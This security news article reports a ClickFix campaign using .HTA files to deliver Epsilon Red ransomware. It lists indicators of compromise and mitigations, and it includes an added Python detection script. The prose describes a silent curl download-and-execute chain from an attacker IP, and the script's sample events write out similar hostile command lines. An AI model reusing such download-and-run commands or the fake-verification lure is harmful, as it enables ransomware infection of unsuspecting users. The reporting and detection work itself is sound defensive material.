Hackers Use Weaponized .HTA Files to Infect Victims with Red Ransomware


CloudSEK’s TRIAD team uncovered an active development site deploying Clickfix-themed malware linked to the Epsilon Red ransomware.

This variant deviates from traditional clipboard-based command injection tactics by directing victims to a secondary page on the same domain, where malicious shell commands are executed silently through ActiveXObject(“WScript.Shell”) to facilitate payload delivery.

The script leverages Windows Command Shell (cmd.exe) for hidden execution, switching to the user’s home directory with “cd /D %userprofile%”, followed by a silent curl command to download a binary from an attacker-controlled IP (155.94.155.227:2269) and save it as a.exe, which is then run invisibly with the parameter ‘0’ to suppress any window.

This culminates in the deployment of Epsilon Red ransomware, identified by its MD5 hash 98107c01ecd8b7802582d404e007e493.

Advanced Clickfix Malware Campaign

To enhance deception, the script displays a fake verification message via “echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause”, complete with an intentional typo to mimic amateurish, non-threatening behavior, keeping the command prompt open for user interaction and reinforcing the social engineering lure.

Figure: the fake verification message displayed by the script

Pivoting through associated infrastructure revealed a broader ecosystem of impersonations, including fake versions of the Discord Captcha Bot (captcha.bot), streaming platforms like Kick, Twitch, Rumble, and OnlyFans, as well as romance-themed dating lures, all designed to deliver Windows payloads via Clickfix mechanisms.

These sites exploit user trust in familiar services, urging clicks on verification buttons that trigger JavaScript-based command execution without overt interaction, aligning with MITRE ATT&CK techniques such as T1189 (Drive-by Compromise) for initial access, T1059.003 (Windows Command Shell) and T1059.005 (JavaScript/VBScript) for execution, and T1204.001 (Malicious Link) for user manipulation.

Defense evasion is achieved through T1027 (Obfuscated Files or Information) with silent downloads and T1036 (Masquerading) via benign-themed interfaces, while expected persistence involves T1053.005 (Scheduled Task/Job). Command and control occurs over T1071.001 (Web Protocols) using HTTP, leading to T1486 (Data Encrypted for Impact) in the ransomware phase.

Mitigation Strategies

Epsilon Red, first observed in 2021, draws loose inspiration from REvil in its ransom-note styling, showing minor grammatical refinements but no deeper tactical or infrastructural overlap.

The campaign’s sophistication lies in abusing ActiveX for remote code execution directly from browser sessions, bypassing conventional download safeguards and enabling endpoint compromise that precedes lateral movement and full encryption.

According to the CloudSEK report, brand impersonation significantly lowers user suspicion and increases infection rates, while the persistent reuse of themed delivery pages indicates a well-planned, long-term operation.

Additional indicators include domains like twtich.cc hosting .HTA files and capchabot.cc for regular Clickfix delivery, alongside a Quasar RAT variant (MD5: 2db32339fa151276d5a40781bc8d5eaa) tied to another C2 IP (213.209.150.188:8112).

Figure: Clickfix-themed malware delivery page

To mitigate, organizations should disable ActiveX and Windows Script Host via Group Policies to block legacy execution vectors.

Integrating threat feeds for IP and domain blacklisting, including Indicators of Future Attack from Clickfix campaigns, is crucial.

Deploy endpoint detection and response rules to monitor hidden executions, silent curl downloads, and anomalous browser-spawned processes.

Finally, conduct security awareness training simulating impersonated services to build user resilience against these socially engineered threats.
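As an added illustration of the EDR monitoring recommended above (this is not code from the CloudSEK report or from this article), the following Python pass scores constructed, Sysmon-style process-creation records against the behaviours the article describes: a script host or browser spawning a shell, a silent curl or Invoke-WebRequest download, a change into %userprofile% followed by execution of a dropped binary, and a match on the report's network indicators. The sample records, the 203.0.113.10 address and the rule names are assumptions made for the example.

```python
import re

# Constructed process-creation records for the example (not telemetry from the report).
SAMPLE_EVENTS = [
    {"parent": "mshta.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c cd /D %userprofile% && curl -s http://203.0.113.10:2269/a.exe -o a.exe && a.exe 0"},
    {"parent": "msedge.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c iwr http://twtich.cc/p.exe -OutFile p.exe"},
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c dir %userprofile%"},
    {"parent": "svchost.exe", "image": "curl.exe", "cmdline": "curl -s https://updates.example.com/manifest.json"},
]

# Parents that should rarely spawn an interactive shell on a workstation.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Network indicators from the article's IOC table, with the defanging brackets removed.
C2_INDICATORS = {"155.94.155.227:2269", "213.209.150.188:8112", "twtich.cc", "capchabot.cc"}

# curl invoked with -s (silent), or PowerShell's Invoke-WebRequest / iwr alias.
SILENT_DOWNLOAD = re.compile(r"\bcurl(?:\.exe)?\s+(?:\S+\s+)*-s\b|\b(?:iwr|invoke-webrequest)\b", re.I)
# cd into the user profile, then a later "&& something.exe" that runs a dropped binary.
USERPROFILE_EXEC = re.compile(r"%userprofile%.*&&\s*\S+\.exe\b", re.I)


def evaluate(event):
    """Return the names of the detection rules this event trips (empty list if none)."""
    hits = []
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if image in SHELLS and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_shell")
    if image in SHELLS and parent in BROWSERS:
        hits.append("browser_spawns_shell")
    if SILENT_DOWNLOAD.search(cmd):
        hits.append("silent_download")
    if USERPROFILE_EXEC.search(cmd):
        hits.append("userprofile_drop_and_run")
    if any(ioc in cmd.lower() for ioc in C2_INDICATORS):
        hits.append("known_c2_indicator")
    return hits


def alerts(events, threshold=2):
    """Indices of events that trip at least `threshold` rules; a lone silent curl is not enough."""
    return [i for i, e in enumerate(events) if len(evaluate(e)) >= threshold]
```

Requiring two corroborating rules keeps the benign `curl -s` from svchost.exe (one weak signal) below the alert threshold while both Clickfix-style chains are flagged.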

Indicators of Compromise (IOCs)

Indicator Type   Value                               Notes
MD5              98107c01ecd8b7802582d404e007e493    Epsilon Red Ransomware
Domain           twtich[.]cc                         Clickfix Delivery [.hta]
IP:Port          155.94.155[.]227:2269               Command and Control
MD5              2db32339fa151276d5a40781bc8d5eaa    Quasar RAT Malware
Domain           capchabot[.]cc                      Clickfix Delivery [regular]
IP:Port          213.209.150[.]188:8112              Command and Control
